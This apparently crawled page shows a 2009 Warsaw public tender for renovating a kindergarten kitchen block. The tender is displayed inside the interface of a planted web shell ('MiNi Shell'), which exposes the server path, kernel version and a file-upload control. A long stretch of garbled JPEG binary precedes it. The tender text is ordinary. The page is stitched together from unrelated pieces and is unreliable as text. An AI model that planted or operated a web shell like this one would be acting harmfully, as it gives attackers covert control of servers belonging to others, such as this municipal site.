JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/79546-N-2009.html

<p class="kh_header"><b>Warszawa: Remont bloku żywienia w budynku Przedszkola nr 134 przy ul. Leszno 24/26 w Warszawie.</b><br>
<b>Numer ogłoszenia: 79546 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa, Dzielnica Wola , Al. Solidarności 90, 01-003 Warszawa, woj. mazowieckie, tel. 022 5048588, faks 022 5048592.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont bloku żywienia w budynku Przedszkola nr 134 przy ul. Leszno 24/26 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje remont pomieszczeń na parterze, piętrze i w piwnicy budynku przedszkola  nr 134 przy ul. Leszno 24/26 w Warszawie z przeznaczeniem na blok żywienia.

Zakres robót:
1.Roboty budowlane 
1.demontaż wyposażenia, ścianek działowych i innych zbędnych elementów budowlanych,
2.wymianę drzwi wewnętrznych wraz z ościeżnicami, 
3.wymurowanie nowych ścianek działowych,
4.wykonanie przebić ścian w miejscach nowych otworów drzwiowych i instalacyjnych, otworów dla przewodów wentylacji grawitacyjnej,
5.wykonanie nowej izolacji przeciwwodnej w posadzce oraz ułożenie gresu układanych na klej,
6.obłożenie ścian płytkami ceramicznymi do wysokości 2,05 m, 
7.pomalowanie farbami zmywalnymi ściany ponad glazurą, 
8.obudowanie płytami g/k na ruszcie aluminiowym przewodów wentylacyjnych i instalacji wod. - kan.
9.montaż szaf przelotowych w zmywalni typu DM-S-3307.

Roboty dodatkowe:
Należy przeczyścić wszystkie kanały wentylacji grawitacyjnej obsługujące pomieszczenia modernizowanego bloku żywienia. Roboty te należy wykonać przed robotami wykończeniowymi w poszczególnych pomieszczeniach.
W kosztach zadania Wykonawca musi uwzględnić koszty za sprawdzenie przewodów wentylacyjnych, spalinowych z uwzględnieniem wentylacji mechanicznej i przekazanie na dzień końcowego odbioru robót Zamawiającemu protokołów z badań i sprawdzeń przez odpowiednie instytucje.

2.Roboty sanitarne 
1)Roboty instalacyjne zgodnie z dokumentacja projektową obejmują:
1)wymianę instalacji gazowej, urządzeń gazowych wraz z wyniesieniem kurka gazowego na zewnątrz budynku, 
2)wymianę instalacji wody zimnej i ciepłej, kanalizacji sanitarnej wraz z montażem separatora tłuszczu, 
3)wymianę wentylacji mechanicznej wraz z dostarczeniem wszystkich urządzeń. 
4)Wymiana instalacji elektrycznej i oświetleniowej.

3.  Wyposażenie kuchni w zakresie:
1)Stół z basenem typu DM- S- 3235(A) gł. 400 mm - szt.2
2)Stół z basenem typu DM - S - 3235 (A) 100x60x85 - szt.1
3)umywalka na szafce typu DMS - 3231 (A,P) o wym. 40x40 - szt.2
4)zlew porządkowy o wym. 40x40cm - szt1
5)stół ze zlewozmywakiem typu DM-S-3212 (A,1) - szt. 3
6)umywalka handlowa 45 x 35cm - szt2
7)stół podwieszany ze zlewozmywakiem jednokomorowym typu DM -S -3270 (A,P) o wymiarach 140 x 60 x 85 - szt.1
8)stół ze zlewozmywakiem jednokomorowy typu DM-S-3201 (A.L) o wymiarach 100 x 60 x 85 - szt.1.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.30.00.00-0, 45.45.30.00-7, 45.33.30.00-0, 45.45.30.00-7, 45.11.00.00-1, 45.44.22.00-9, 45.40.00.00-1, 45.31.57.00-5, 45.31.12.00-2, 45.31.11.00-1, 45.50.00.00-1, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium - 9.000,00   zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.Złożą ofertę zgodnie z warunkami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz ustawie Prawo zamówień publicznych.
2.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, które obejmują swym zakresem przedmiot zamówienia.
3.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1)Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 podobne roboty odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia. 
Zamawiający wymaga, aby:
a)co najmniej jedna robota budowlana obejmowała swoim zakresem między innymi montaż wentylacji mechanicznej,
b)co najmniej jedna robota budowlana obejmowała wykonanie remontu pomieszczenia/pomieszczeń o charakterze zbiorowego żywienia, przystosowanych do przygotowywania posiłków, np.: kuchni w hotelu, restauracji, ośrodku wypoczynkowym, szkole, przedszkolu.
Roboty te mogą obejmować wykonanie ww. zakresu łącznie lub oddzielnie.                              Z wskazanych przez wykonawcę co najmniej 2 robót budowlanych powinno wynikać łączne spełnienie warunków a), b), c) postawionych przez Zamawiającego.
 Zamawiający wymaga aby wykazane roboty budowlane obejmujące ww zakres były  o wartości brutto minimum 300.000,00 zł. każda.
2)Wykonawca musi wykazać, że dysponuje osobami (kadry kierowniczej i pracowników), zdolnymi do wykonania przedmiotu zamówienia:
a)Kierownik budowy musi posiadać uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej i należeć do Izby Inżynierów Budownictwa.
b)Kierownicy robót muszą posiadać uprawnienia budowlane do kierowania robotami w specjalnościach:
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  gazowych, wodociągowych i kanalizacyjnych,
 - instalacyjnej w zakresie instalacji i urządzeń elektrycznych,
oraz należeć do Izby Inżynierów Budownictwa.
4.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawca musi wykazać, że posiada aktualną na dzień składania ofert polisę ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w wysokości co najmniej 400.000,00 zł. 
5.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w przypadkach wskazanych w art. 24 ustawy - Prawo zamówień publicznych. 
6.Wniosą wadium ( na zasadach określonych w Części VI ).

Ocena spełniania w/w warunków dokonywana będzie wg formuły: spełnia / nie spełnia, na podstawie złożonych dokumentów i oświadczeń, o których mowa w części V SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie muszą być dołączone do oferty w celu potwierdzenia spełniania warunków udziału w postępowaniu:
1.Formularz ofertowy sporządzony zgodnie ze wzorem stanowiącym - załącznik nr 1.
2.Kosztorys ofertowy sporządzony na podstawie przedmiarów robót stanowiących załącznik do SIWZ, metodą kalkulacji szczegółowej. 
Kosztorys powinien zawierać ceny jednostkowe z narzutami.
Ceny jednostkowe i wszystkie wyliczone wartości należy podać z dokładnością do dwóch miejsc po przecinku. 
Kosztorys powinien zawierać stawkę roboczogodziny i wysokość narzutów(patrz część X SIWZ). 
3.Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 pkt 1-4 ustawy Prawo zamówień publicznych - o treści zgodnej ze  wzorem stanowiącym załącznik nr 2. 
4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.Potwierdzenie wniesienia wadium. 
a)Oryginał dokumentu w przypadku wniesienia wadium w formie niepieniężnej. Zamawiający zwracając wadium w trybie art. 46 ustawy Prawo zamówień publicznych zwróci wykonawcy oryginał dokumentu wadium. W dokumentacji przetargowej zostanie poświadczona -za zgodność z oryginałem-kserokopia zwróconego dokumentu wadium. Wobec powyższego zaleca się nie spinać w sposób trwały dokumentu wadium z ofertą.
b)W przypadku wniesienia wadium w formie pieniężnej oryginał lub kserokopia poświadczona -za zgodność z oryginałem- dokumentu potwierdzającego dokonanie przelewu (wyciąg z rachunku, potwierdzenie dokonania przelewu) lub dokumentu polecenia przelewu.
6.Aktualną na dzień składania ofert polisę ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej w wysokości co najmniej 400.000,00 zł.
7.Wykaz wykonanych robót wraz z informacjami o nazwie zadania, całkowitej wartości, terminie wykonywania, o treści zgodnej ze worem stanowiącym załącznik nr 3. Z wykazu powinno wynikać spełnienie warunków postawionych przez Zamawiającego w części IV ust. 3 pkt 1. 
Do wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie. 
8.Wykaz osób (kadry kierowniczej i pracowników), które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia            i wykształcenia niezbędnego do wykonania zamówienia, o treści zgodnej ze worem stanowiącym załącznik nr 5. Z wykazu powinno wynikać spełnienie warunków postawionych przez zamawiającego w części IV ust. 3 pkt 2.
Do wykazu należy dołączyć kserokopie uprawnień i aktualne  zaświadczenia z Izby Inżynierów Budownictwa.
Wykonawca musi dołączyć do wykazu pisemne zobowiązanie innego podmiotu do udostępnienia wskazanych osób zdolnych do wykonania zamówienia, jeśli wykonawca wskazał takie osoby w wykazie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wola.waw.pl/index.php?go=4&show=przetargi/info.htm.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia (cena 80,00 zł.) można odebrać w siedzibie zamawiającego, lok. Nr 219  lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 12:00, miejsce: Miasto Stołeczne Warszawa Urząd Dzielnicy Wola, Al. Solidarności 90, 01-003 Warszawa w pokoju Nr 219 Wydziału Zamówień Publicznych dla Dzielnicy Wola.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com